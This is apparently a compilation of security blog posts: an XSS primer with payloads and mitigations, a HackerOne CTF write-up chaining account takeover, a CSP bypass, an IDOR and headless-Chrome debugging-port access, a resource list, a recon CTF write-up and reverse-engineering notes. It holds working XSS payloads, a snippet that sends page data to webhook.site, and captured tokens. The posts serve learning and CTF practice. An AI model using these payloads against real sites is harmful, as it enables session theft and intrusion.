- Attack requires the victim to click on a link. i.e https://realsite.com/?search=<img src=x onerror=alert(document.cookie)
- When the victim clicks the link, the vulnerable application will execute the payload in the victim's context because the value passed to the search param is being echoed back in the body of the response unsanitized, in the example above the application will try to render an image that does not exist, and thanks to html I can execute JavaScript by using the onerror event handler, since JavaScript has access to the document.cookie we can put it in an alert prompt for testing.

stored
- The unsanitized data can be saved somewhere in the application's database, for example in an application that contains a profile with an editable bio section, if the user's input is not being properly sanitized an attacker might be able to submit "><script>prompt</script> in their "bio" and save it, this specific string if left unsanitzed will execute JavaScript each time the page is visited.
- This type of xss is for the most part considered of higher severity than reflected xss since stored xss does not need user interaction to execute, the victim simply has to visit the page for the malicious code to run.

dom
- DOM XSS is a bit different, the attack takes advantage of client side JavaScript that uses unsanitized user input,might be possible to execute JavaScript in the victim's context
- https://evil.com/#pirateducky"><script>alert(1)</script>
- If the application is using the URI fragment to pass down data to the application, our payload might be able to achieve execution, in the example below the URI fragment is being used somewhere in code which then gets written to the DOM and since this is a script it will execute the alert prompt.

Methodology

Finding XSS requires a good understanding on how an application responds to unsafe input. Testing all inputs is essential to understanding how the application behaves, sometimes developers forget to sanitize all API endpoints so always look at an application well and gather as much information as possible, check JavaScript files and see if you can find where user input is being passed down to the application(sinks). When testing for xss, I usually try to see if I can inject the following payload first:

"'/><h1>test</h1
// this payload will close the tag before it and start a new tag

This will answer some assumptions about the application I am testing:

Is the application sanitizing dangerous characters(/,<,>,",')?
Does the application render the payload?

The process can be done regardless of the type of xss I am looking for, the main takeaway is seeing what is being echoed back in the body of the response, if I can get the application to render the html I submitted the next thing to check is if I can execute JavaScript, some ways of doing this are:

"><script>alert(1)</script> // straight to point, executes using script tag
"><img src=x onerror=prompt /> // a bit more covert, executes JavaScript using error handlers
<body onload=alert(1)/> // executes using event handlers

Impact

Evaluating the impact of xss like other vulnerabilities comes down to where the vulnerability is in the application and how hard it is to fire an attack. Reflected xss is typically lower than stored xss since the latter does not require any interaction, while reflected xss needs the victim to click a link sent by an attacker - this might be done using phishing techniques.

Account Hijacking
- If the attacker is able to steal the victim's cookies the attacker might be able to hijack the session by impersonating the victim
Defacement
- If the attacker can inject JavaScript changing the DOM is possible, also if just html injection is achieved this also applies
Information Disclosure
- If sensitive information is stored in clientside JavaScript it can be exfiltrated a number of ways

Mitigation

If we only break stuff it means we are only doing half of our job, we also have to provide ways to mitigate the vulnerability.

To mitigate xss developers should:

Identify all places user provided input is used in the application
Escape characters that will allow injection such as <,>,/,",'
Output should be encoded everywhere user input is displayed
Filter and validate user input as strictly as possible
Use HTTP headers to your advantage including Content Secure Policy to restrict access to sources such as external scripts

wow, that was cosmic

pirateducky — Thu, 23 Jan 2020 16:52:57 +0000

Before I start I just want to thank @checkm50 & @al-madjus for including me in the team. #TogetherWeHitHarder

tldr; Account take over => CSP bypass to execute javascript => IDOR => Access to internal network => access to debugging on headless Chrome.

Original Report Submitted

This was the beginning of the of the H1 CTF - last year I didn't get far on my own so this year I collaborated with 2 awesome hackers @checkm50 & @al-madjus we spent days trying to figure out how to get this done - thankful for being able to bounce ideas back and forth with them, this write up explains how we went from account takeover to infiltrating the internal network and accessing debugging endpoints on a headless google chrome instance.

Application mapping

Description

Application allows users to sign up for a trial in which they can convert images into pdf files, on signup you also receive a QR code for account recovery. The initial account does not have access to /support which requires a full account, when generating pdfs the user's name is pulled from the application and used in the finished pdf, /settings allows to edit the user's name.

Account Takeover

To create an account you need:

name
email
username
password

Once you do that, the back-end generates a QR code that can be used for account recovery, if you decode the QR code you can see that it has the following format: email:hash at this point the idea was to somehow register an account with some invalid characters that would get stripped right before the QR generation function, if this happens we could basically register the email jobert@mydocz.cosmic{}<> the extra characters would get stripped and we could obtain a valid QR for the account jobert@mydocz.cosmic

We found the jobert@mydocz.cosmic email when doing initial recon - it was left behind in the review section of the sign-in screen.

So now we could log into jobert's account using the /recover endpoint and our forged QR code, however the account could not upload any documents, but we did have access to the /support page which had a chat, once we initiated conversation with the bot we noticed that we could inject html, using webhook.site we tested this by trying to request an image - it worked. Can we execute JavaScript? Enter CSP policy.

CSP || GTFO

When we tried to execute javascript we noticed the following CSP policy:

Content-Security-Policy: 
default-src 'self'; 
object-src 'none'; 
script-src 'self' https://raw.githack.com/mattboldt/typed.js/master/lib/; 
img-src data: *

So we can't execute any scripts unless they come from https://raw.githack.com/mattboldt/typed.js/master/lib/ great - now to look for a bypass, after a long time we found the bypass by using https://raw.githack.com/mattboldt/typed.js/master/lib/@https://github.com/username/repo_name/master/file_name.js

You have to remove the /blob/ path from your github for this to work

this allowed us to run scripts and bypass CSP, so what's next?

Let me speak to your manager

When we did the ATO for jobert we noticed that support was available, so I look into what was being loaded:

function showReviewModal() {
    $("#review-modal").modal("show");
    for (var e = 0; e <= 5; e++) $("#star-" + e).removeClass("checked");
    $("#review-button").attr("disabled", !0)
}
rating = 3, $(".review-star").click(function(e) {
    rating = $(this).data("rating");
    for (var t = 1; t <= rating; t++) $("#star-" + t).addClass("checked");
    for (t = rating + 1; t <= 5; t++) $("#star-" + t).removeClass("checked");
    $("#rating-input").val(rating), 1 === rating && $("#report-message").text("We're sorry about that. Our team will review this conversation shortly."), $("#review-button").attr("disabled", !1)
}), $("#chat-form").submit(function(e) {}), $("#chat-form").submit(async function(e) {
    e.preventDefault();
    var t = $("#chat-textarea").val();
    if ("finish" !== t.toLowerCase() && "quit" !== t.toLowerCase()) {
        if ($("#chat-textarea").val(""), $("#chat-button").attr("disabled", !0), $("#chat-div").append(decodeURIComponent('<h3><span class="badge badge-primary">' + t + "</span></h3>")), window.scrollTo(0, document.body.scrollHeight), t.length > 0) {
            var a = await fetch("/support/chat?message=" + t);
            showTypedMessages([(await a.json()).response])
        }
        $("#chat-button").attr("disabled", !1), $("#chat-textarea").focus()
    } else showReviewModal()
}), showTypedMessages(["Hello!", "How can I help you?"]), $("#chat-textarea").focus();

If you ran showReviewModal() from your dev console you would get a "Review" modal, where if given 1 star you would receive the "We're sorry about that. Our team will review this conversation shortly." message - quick shout out to the hacker101 ctf there's a challenge just like this one there that helped us understand what was going on.

If we included a payload here - it would fire once in our browser and again from the reviewer's side - interesting, we looked for a lot of stuff here, but the most important one was getting the current url of the browser:

var image = document.createElement("img")
var image.src = "webhook.site/1234/img.png?url= + window.location.href
document.body.appendChild(image)

Using this payload we were able to see this:

http://localhost:3000/support/review/39b707f120c5fde356bf0f5daec51bee292d38862d2bc7d09ba032257365e2dd

Which if turned into: https://h1-415.h1ctf.com//support/review/39b707f120c5fde356bf0f5daec51bee292d38862d2bc7d09ba032257365e2dd

Would give us direct access to the review - the review page looked like:

Here we got stuck, what could possibly be next?!

IDOR YOU

We tested everything - and after many hours discovered an IDOR that allowed us to change user's name remember from before - the user's name gets added to the final pdf but we had tried to inject html before using /settings and it encoded everything correctly - maybe this /review route is not encoding characters properly - so we tried it, we signed up for a new account - submitted the /review form but with another user's user_id, which can be found in the /settings page as a hidden input

POST /support/review/6542aa9e862bae99ebff66ce40c3a01402e6ec1263d661d40c552d875a9102e0 HTTP/1.1
Host: h1-415.h1ctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: _csrf_token=71d2eed9870ab7ff665140ebd1a68391a57fd3ee; session=.eJw9y9EKwiAYhuF7-Y9HzK3p5lH3ESG_-kmrnEPtYEX33iDo8IXnfZNxJQdT0x0LaVLCd4CfRtWyVSFIOYhjC-sFy7GfBA8q-B6ghtyVK-nzpSFEnh_7fEsWuZ7i5pN7HVwqcXY7fBZkU7cVpLtfLRzx9_T5AvsNKzQ.XiahyQ.frH-NvIt1yzgFztKvF5RlR0c5ho

name=<img src=webhook.site/>&user_id=3&_csrf_token=71d2eed9870ab7ff665140ebd1a68391a57fd3ee

This request allowed us to set the name of user:3 as <img src=webhook.site/> which if everything worked would allow us to get more information about the backend - and it did. I also used @daekens ssrf tester which gave me this information:

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.0 Safari/537.36

Cool, so now we know that this pdf is being rendered by HeadlessChrome - but now what?

I heard you like iFrames

We can inject html markup and we know it'll be rendered server-side and then displayed when we convert an image to a pdf, we also know that the application actually runs on localhost:3000 because the calls come back from there - so let's try to port scan and see if we can something else in there!

We tried everything we could - yes even localhost:1337 and nothing was coming up, I was about to go to bed - after almost a week at it I was tiered and sleepy but @checkm50 wouldn't let me give up, so we continue, I opened up google and searched for headless chrome port if all fails - GOOGLE!

And in there I found the following

chrome \
  --headless \                   # Runs Chrome in headless mode.
  --disable-gpu \                # Temporarily needed if running on Windows.
  --remote-debugging-port=9222 \
  https://www.chromestatus.com   # URL to open. Defaults to about:blank.

I see a port number - so let's give it a go and receive we Inspectable WebContents okay at least is not empty or forbidden - so I show this to checkm50 and he says to look at /json so I used this as a payload:

<iframe src='http://localhost:9222/json' width=900 height=900></iframe>

In there you can see: secret_document=0d0a2d2a3b87c44ed13e0cbfc863ad4322c7913735218310e3d9ebe37e6a84ab.pdf"

That looks good - let's try to open it using the /documents/ endpoint:

https://h1-415.h1ctf.com/documents/0d0a2d2a3b87c44ed13e0cbfc863ad4322c7913735218310e3d9ebe37e6a84ab.pdf

This was my reaction:

Thoughts

Collaboration brings the best out in people, allowing others to hear your thoughts and bounce ideas is the reason why we solved this. It was hard and it pushed me to learn new things. I started last year using the hacker101 ctf and I'm so thankful I joined. If you want to learn signup and join us on discord

hacking on a budget

pirateducky — Tue, 21 Jan 2020 21:46:17 +0000

We have all been there - specially when you start looking at some of the certs/courses out there like:

AWAE(USD 1400.00)
OSCP (USD 800.00)
SANS (USD LOL)

And the list goes on, now are these good? sure if you can afford them or if your employer is paying for them, but what if you're in your 20s with a low paying job and a family? That cert could be your rent(it was for me).

When I started wanting to learn how to hack I thought you needed to get the most up to date courses, and books and sometimes I felt like I couldn't do it, like it was out of my reach, but then I just started to learn online, reading blogposts and watching videos - now more than ever the material you need to learn to get your foot in the door is available for free thanks to all the awesome content creators out there.

In this blog post I'll share a few of the resources that have helped me to get started on a budget. I'll be focusing on web application hacking since that's what I've been doing for about a year so I have managed to gather a ton of information about that.

Not exhaustive lists but should get you started, if it does not have a price - the resource is free.

Web applications

The number 1 thing when you want to learn about hacking web application is learning how web apps works, you don't have to be an expert but definitely understand how an application is put together, both frontend and backend.

Report Writing

Reports are a huge part of hacker's day to day activities, report writing should be something that yous stride to become good at, it could be the difference between getting paid for a report and your report being marked informational.

Learn from reports

If you aren't reading other researcher's disclosed reports - you are doing it wrong. I try to read at least 1 report a day and understand what the researcher found and the impact. Read good and bad reports so you know what works and what doesn't. You can find other resources but my go to is H1's hacktivity page.

Hacktivity

Books

Reading is a big part of this, you have to be willing to read some pretty dry material, break it down into smaller more digestible pieces, my go to books are

WAHH(USD $40.52)
Tnagled Web (USD $44.49)
Web Hacking 101 (Free when you join H1)

Videos

This one has been getting so much content lately, with creators like @nahamsec, @stökfredrik, @thecybermentor & @InsiderPhD putting out some 🔥 content. Here's a list of youtube channels to subscribe to.

Practice

You have all this knowledge - now what? you practice of course! It's 2020 you don't have to try to hack someone's site, or get in trouble - companies like hackerone have created awesome resources for us to learn like hacker101 an ongoing CTF that rewards you with private invitations to programs that pay money. There's other CTFs that work but this one gives you an incentive to keep going, and the community is awesome.

hacker101 CTF
hacker101 Discord
rootme
lkwa
pentesterlab (USD $20/monthly)
Portswigger Academy
- Free but you need burp pro for some exercises, still really good resource.

Newsletters/blogs

Some stuff I subscribe to that might interest you

Sharing knowledge is a hacker's way of giving back, is how we interact with one another and make friends, if this helped you please share it so others can have access to the information.

Nahamsec's 30K CTF

pirateducky — Thu, 16 Jan 2020 05:54:42 +0000

tldr: The CTF was hosted at nahamsec.net, there were some credentials leaked in this repo which also disclosed the /swagger endpoint, using findomain I was able to get the subdomain api-admin.nahamsec.net which had a swagger instance running with a /api/getflag endpoint which accepted the username & password we found and gave us the flag.

Rules

Everything needed to complete the CTF was given in the blogpost

No cheating or sharing answers
Nahamsec.com / Nahamsec.dev or any of the boxes I have used during my streams are not used for this CTF.
This is a recon CTF! Think recon and check out the tips or ideas I have shared while streaming for inspo.
Please don’t ask for help or hint on Twitter. If I have anything to share, they’ll be posted directly on my Twitter so it’s fair and available for everyone.
If you want to solve this to become a part of my mentorship program, send your submissions in with “[NMP]” in the beginning of the title. (i.e.: [NMP] Recon Submission)

Full Report

The image in the blog was being loaded from a different domain: nahamsec.net. I did a google search for site:nahamsec.net and noticed the title said Welcome To Nahamsec Giveaway CTF. After this I also did the same in GitHub, the search query was search?q="nahamsec.net" which took me to https://github.com/garagosy/nahamsecCTF2020 a repo that got uploaded recently with some interesting information ;) it's important to note this from the CTF announcement "Also, a big thank you to...Yasser Ali" who is the owner of the mentioned GitHub repo.

After having this information I looked for subdomains and found:

# used findomain to find the subdomains
api-admin.nahamsec.net
30kftw.nahamsec.net
api-dev.nahamsec.net

The one subdomain that stood out was api-admin but I wanted to look at all of them to cover the bases, from the GitHub repo above I knew there would be a swagger instance, which makes sense since Nahamsec has talked about how he likes seeing those, I tried the /swagger route on the 3 subdomains I found and the only one to give me a response back was api-admin.nahamsec.net so now I can see a swagger UI.

Cool now we have can see 2 routes: /api/getFlag & /api/tokens.

The /api/getFlag route looks like it's a post request, so I tried to do execute from within the swagger ui but it gives me a 500 error, so then I go straight to the route api-admin.nahamsec.net/api/getFlag and get an http username & password prompt - hmm let's try the credentials from the GitHub repo:

This is the response:

I stopped here and sent an email to the email included in the response.

After going back and trying to hit the token route I received the following JWT - I forgot to check this route after using the username/password.

# response from `/api/token`
{
  "duration": 600, 
  "token": "eyJhbGciOiJIUzI1NiIsImV4cCI6MTU3ODc3ODA4NiwiaWF0IjoxNTc4Nzc3NDg2fQ.eyJpZCI6Mn0.Bk1enMme_sQlEdWoMizDAFJwK8HEaVgubk9nVbz-Was"
}

Thoughts

I had a lot of fun, finding the smallest things that looked off, like the CTF image coming from nahamsec.net and then looking in GitHub for anything related to that domain (shout out to @jhaddix I watched his latest stream and he did some github dorking), the rest are usual steps that Nahamsec has done in his streams and presentations like subdomain enumeration and directory bruteforcing (once I found the GitHub repo I focused on swagger stuff). It was really cool seeing that everything I learned this past year can be used and applied. I hope everyone else had as much fun as I did!

Resources

RE Week 2

pirateducky — Mon, 28 Oct 2019 02:14:01 +0000

This has been week #2 learning reverse engineering, this time I've gone over some basics:

The call stack
- What is it? How does it work?
Assembly
- Learning more about assembly x86
- How does assembly work

Week #2 has been all about the stack and assembly. Going over the preparations section of the workshop, I went over the purpose of the stack as well as assembly:

What is the stack?

The stack is a data structure, it gets assigned an area of memory which it uses to store information about the executing program, it uses registers(storage areas, esp, ebp,eax, nop etc) to know what's executing by storing data & memory addresses, we can use instructions(actions we can perform using assembly language like push, pop, mov, jmp and more) to interact with the stack
The stack grows down to higher memory addresses, which also means the stack starts at lower memory addresses.
The stack keeps track of everything that happens when a program executes, it knows exactly what variables the program will use and which functions are running by using registers like ebp(which points to the base of the stack) and eip(which points to the next instruction to perform).

What is assembly?

Low-level programming language
Gets turned into machine language
Instruction set is used to write programs which use registers and instructions
- some instructions include:
  - nop push pop mov add call ret
- all instructions performs actions using registers
  - mov eax, [ebx]: move the 4 bytes in memory at the address contained in ebx into eax
- instruction format
- operation argument
- operation argument, argument
  - mov eax, [ebp-8] square brackets acts as the de-reference operator in c so the mov instruction "moves" the value that's at ebp-8 and stores it inside eax [Intel Syntax]

Next week: Going over some basic C, installing tools, trying some exercises

Resources

azeria-labs more about the stack
OALabs: youtube channel
Discord: resources, and community
Awesome RE: Github repo
ROP beginers: return-oriented programming (here for later reference)

Modern X86 ASM
x86 ASM

cover image
asm cheatsheet
x86 Intro